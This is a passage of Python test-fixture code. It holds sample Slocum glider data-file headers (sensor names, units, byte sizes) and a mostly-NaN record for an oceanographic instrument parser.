enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim
1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 """
HEADER4 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 347
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files x_low_power_status
enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim volts
1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 4 """
HEADER5 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 354
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files sci_flbb_timestamp sci_flbb_bb_ref sci_flbb_bb_sig sci_flbb_bb_units sci_flbb_chlor_ref sci_flbb_chlor_sig sci_flbb_chlor_units sci_flbb_therm
enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim seconds 1 1 1 1 1 ug/L 1
1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 """
HEADER6 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: gi_528-2015-228-3-0
the8x3_filename: 00540000
filename_extension: sbd
filename_label: gi_528-2015-228-3-0-sbd(00540000)
mission_name: INI0.MI
fileopen_time: Mon_Aug_17_14:45:23_2015
sensors_per_cycle: 40
num_label_lines: 3
num_segments: 1
segment_filename_0: gi_528-2015-228-3-0
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_lat m_leakdetect_voltage m_leakdetect_voltage_forward m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_bb3slo_b470_sig sci_bb3slo_b532_sig sci_bb3slo_b660_sig sci_bb3slo_temp sci_bsipar_par sci_flbbcd_bb_sig sci_flbbcd_cdom_sig sci_flbbcd_chlor_sig sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_oxy4_temp sci_suna_nitrate_mg sci_suna_nitrate_um sci_suna_record_offset sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon lat volts volts lon rad sec timestamp m/s m/s m/s nodim nodim nodim nodim nodim ue/m^2sec nodim nodim nodim sec timestamp um % degc mg/l umol/l bytes s/m bar degc
4 8 8 4 4 4 4 4 8 8 8 4 4 8 4 4 8 4 4 4 4 4 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 4 4 """
FLORD_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 664.424 0.401911 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 139 0.000281336 460 72 2.0352 695 114 0.8349 NaN 560 1000.1 NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN 266.42 93.49 9.48 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 700 139 0.000281 695 114 0.8349 560
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 